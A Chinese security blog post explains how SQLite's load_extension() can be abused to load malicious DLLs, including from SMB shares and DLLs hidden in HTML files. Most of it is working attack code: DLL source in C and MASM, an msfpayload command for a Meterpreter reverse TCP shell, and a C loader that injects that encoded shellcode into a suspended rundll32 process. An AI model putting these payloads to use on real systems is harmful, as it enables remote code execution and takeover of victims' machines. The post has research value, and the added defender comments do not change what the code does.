
谈一谈SQLite Load_Extension的妙用

October 10, 2016 • Security

什么是load_extension?

这个接口用于从共享库文件中加载一个SQLite扩展。

int sqlite3_load_extension(
sqlite3 *db, /* Load the extension into this database connection */
const char *zFile, /* Name of the shared library containing extension */
const char *zProc, /* Entry point. Derived from zFile if 0 */
char **pzErrMsg /* Put error message here if not 0 */
);

更多信息:http://www.sqlite.org/c3ref/load_extension.html

你可以用这个函数来加载一个SQLite扩展。但是在默认情况下扩展加载功能是关闭的(需要调用sqlite3_enable_load_extension()显式开启),以防止SQL注入攻击借助它加载任意库。需要C接口但不希望暴露SQL层load_extension()函数的程序,可以改用sqlite3_db_config()的SQLITE_DBCONFIG_ENABLE_LOAD_EXTENSION选项只开启C接口。

了解更多:http://www.sqlite.org/c3ref/enable_load_extension.html

语法:

select load_extension('path\dll', 'EP');

const char *zFile参数所指的路径也可以是一个SMB共享路径。

自定义DLL

我们可以定义自己的恶意DLL文件并执行我们自己的恶意代码

#include <windows.h>
/*
 * Author: @OsandaMalith 
 * Website: http://osandamalith.com
 */
/*
 * DllMain: entry point of the demo DLL that load_extension() maps.
 *
 * Shows one message box when the process attaches and another for the three
 * remaining notifications; any other reason code is ignored. Always returns
 * TRUE so the library stays loaded.
 *
 * The point for a defender: this code runs as soon as the library is mapped,
 * independent of the zProc entry point SQLite later calls, so a loaded
 * extension needs no SQLite-specific export at all to execute.
 */
BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    const BOOL attaching = (fdwReason == DLL_PROCESS_ATTACH);
    const BOOL other_notification =
        fdwReason == DLL_THREAD_ATTACH ||
        fdwReason == DLL_THREAD_DETACH ||
        fdwReason == DLL_PROCESS_DETACH;

    if (attaching) {
        MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
    } else if (other_notification) {
        MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
    }
    return TRUE;
}
  
int hello() {
    MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);

也可以使用MASM32的代码,这是个体积非常小的DLL:

.386

 ; Author: @OsandaMalith 
 ; Website: http://osandamalith.com

.MODEL flat,stdcall

OPTION CASEMAP:NONE

Include windows.inc
Include user32.inc
Include kernel32.inc

IncludeLib user32.lib
IncludeLib kernel32.lib

.DATA

AppName            db "DLL Skeleton",0
HelloMsg        db "Just Kidding :)",0
LoadMsg            db "You got Pwned!",0
UnloadMsg        db "The DLL is unloaded",0
ThreadCreated    db "A thread is created in this process",0
ThreadDestroyed    db "A thread is destroyed in this process",0

.code
; DllEntry: DLL entry point. Pops a message box keyed on the attach/detach
; reason and reports success (EAX = TRUE) in every case.
; The DLL_PROCESS_ATTACH branch is what fires when load_extension() maps the
; library, before any exported procedure such as hello is looked up.
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
    .if reason==DLL_PROCESS_ATTACH
        invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
    .elseif reason==DLL_PROCESS_DETACH
        invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
    .elseif reason==DLL_THREAD_ATTACH
        invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
    .else        
        ; any remaining reason code (DLL_THREAD_DETACH in practice)
        invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
    .endif
    mov  eax,TRUE   ; non-zero return keeps the DLL loaded
    ret
DllEntry Endp

; hello: the procedure named as the zProc entry point in the
; load_extension() call. Shows an informational message box and returns;
; by the time it runs DllEntry has already executed on DLL_PROCESS_ATTACH.
hello proc
    invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
    ret    
hello endp

End DllEntry

1.png

HTML + DLL

你可以参考hasherezade的drop_and_run项目

http://github.com/hasherezade/snippets/tree/master/drop_and_run 中的demo.html演示了把DLL文件嵌入在HTML注释里。因此,我们也可以把恶意DLL代码嵌入到一个HTML文件中

select load_extension('\\192.168.0.100\WinAsm\dll\cdll.html','hello');

2.png

Shellcode + GameOver

也可以在自己的DLL中嵌入shellcode,在这个例子中我使用的是Meterpreter反向TCP shellcode

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -t c

Code:

#include <windows.h>
/*
 * Website: http://osandamalith.com
 */
#define SCSIZE 2048
/*
 * code: the encoded payload emitted by the msfencode command above, stored in
 * a SCSIZE-byte buffer (the literal is shorter than SCSIZE; the remainder is
 * zero-filled by the initializer).
 *
 * Defender note: treat this as an opaque blob. boom() copies the whole
 * SCSIZE-byte buffer into the target process, so the allocation size and the
 * injection behaviour are the stable indicators; the bytes themselves change
 * with every encoder run.
 */
unsigned char code[SCSIZE] = 
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";
 
/*
 * inline_bzero: write l zero bytes starting at p.
 *
 * Hand-rolled equivalent of memset(p, 0, l). Its only caller in this file
 * uses it to clear a STARTUPINFO before setting cb. l == 0 writes nothing.
 */
void inline_bzero(void *p, size_t l)
{
    unsigned char *dst = p;
    while (l-- > 0) {
        *dst++ = 0x00;
    }
}
  
void boom(void);
  
/*
 * DllMain: entry point of the payload DLL.
 *
 * Only DLL_PROCESS_ATTACH does anything: it hands off to boom(). The other
 * three notifications are deliberately no-ops, and the function always
 * reports success.
 *
 * Defender note: because this fires on attach, the payload runs the moment
 * the host process maps the DLL — no SQLite entry point has to be resolved or
 * called first.
 */
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH) {
        boom();
    }
    return TRUE;
}
  
/*
 * boom: payload launcher called from DllMain on DLL_PROCESS_ATTACH.
 *
 * As written, the sequence is: spawn rundll32.exe suspended at idle
 * priority, read its initial thread's context, allocate SCSIZE bytes of
 * read/write/execute memory in the child, copy `code` into it, point the
 * thread's instruction pointer at that buffer, resume the thread, drop both
 * handles, then end the calling thread.
 *
 * Defender notes: every step is ordinary, loggable API activity — a
 * suspended child process created by the database host, a cross-process
 * PAGE_EXECUTE_READWRITE allocation, WriteProcessMemory, and
 * SetThreadContext/ResumeThread on the child's first thread. That sequence,
 * coming from a process that has just loaded a DLL over a UNC path, is the
 * behaviour to alert on; the byte pattern in `code` is not stable.
 */
void boom(void) {
    int error;              /* declared but never used */
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    CONTEXT ctx;
    DWORD prot;             /* declared but never used */
   LPVOID ep;
 
    inline_bzero( &si, sizeof( si ));
    si.cb = sizeof(si);
  
    /* The child starts suspended so its first thread can be redirected before it runs. */
    if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
        ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);
  
        /* Writable and executable in one allocation: the RWX pattern memory scanners key on. */
       ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  
        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
  
#ifdef _WIN64
       ctx.Rip = (DWORD64)ep;
#else
       ctx.Eip = (DWORD)ep;
#endif
  
        /* Only CreateProcess is checked; none of the remote-process calls above are. */
        SetThreadContext(pi.hThread,&ctx);
  
        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
   /* Ends the current thread — presumably the one the host used for load_extension() — instead of returning. */
   ExitThread(0);
}

3.png

参考
